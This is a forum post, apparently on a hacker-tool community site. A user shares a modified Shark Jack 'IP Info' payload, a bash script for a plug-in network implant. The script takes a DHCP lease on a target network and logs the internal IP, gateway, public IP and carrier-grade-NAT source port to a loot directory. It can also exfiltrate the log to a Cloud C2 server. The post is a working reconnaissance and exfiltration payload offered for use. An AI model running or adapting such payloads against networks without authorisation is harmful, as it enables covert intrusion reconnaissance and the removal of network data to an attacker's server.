Jump to content

[PAYLOAD] IP Info


Darren Kitchen
 Share

Recommended Posts

  • 5 months later...

Yey! Thank you @Darren Kitchen, that's about what I wanted to create today. There is just one downside: Many of our Internet providers nowadays are using carrier-grade NAT (https://en.wikipedia.org/wiki/Carrier-grade_NAT) and to really identify the internet connection one also needs to know the source port and the exact time of a connection... I searched for quite some time to find a service actually providing this information and included the Port information into the logging. I am pretty sure that there should be some more reliable way in obtaining this information (like from an API) but currently I can't find any. Any suggestions are Welcome!

#!/bin/bash
#
# Original Payload: IP Info by Hak5Darren
# Original Link:    https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh
#
# Description:  This payload gathers internal and external IP address info,
# including default gateway, saving the log to the loot directory and
# optionally exfiltrating the log to Cloud C2 if CLOUDC2=1
#
# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
# LED ATTACK (Yellow Blink)... Saving IP address information
# LED FAIL (Red Blink)... Failed to gather public IP address
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful
 
CLOUDC2=0
LOOT_DIR=/root/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"
 
function FAIL() { LED FAIL; exit; }
LED SETUP
 
# Make log file
mkdir -p $LOOT_DIR
LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log"
LOG="$LOOT_DIR/$LOG_FILE"
 
# Ask for IP address
NETMODE DHCP_CLIENT
 
# Wait until Shark Jack has an IP address
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
 
LED ATTACK
# Gather IP info and save log
INTERNALIP=$(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'})
GATEWAY=$(route | grep default | awk {'print $2'})
PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL
PUBLICPORT=$(wget --timeout=30 http://www.dnstools.ch/wie-ist-meine-ip.html -qO - | grep 'Remote Port' | egrep -o '[[:digit:]]{2,5}')
echo -e "Date: $(date)\n\
Internal IP Address: $INTERNALIP\n\
Public IP Address: $PUBLICIP\n\
Public Port Number: $PUBLICPORT\n\
Gateway: $GATEWAY\n" >> $LOG
 
# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
    LED SPECIAL
    C2CONNECT
    while ! pgrep cc-client; do sleep 1; done
    C2EXFIL STRING $LOG IPinfo
fi
 
LED FINISH

PS: I couldn't find the bash highlighting...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...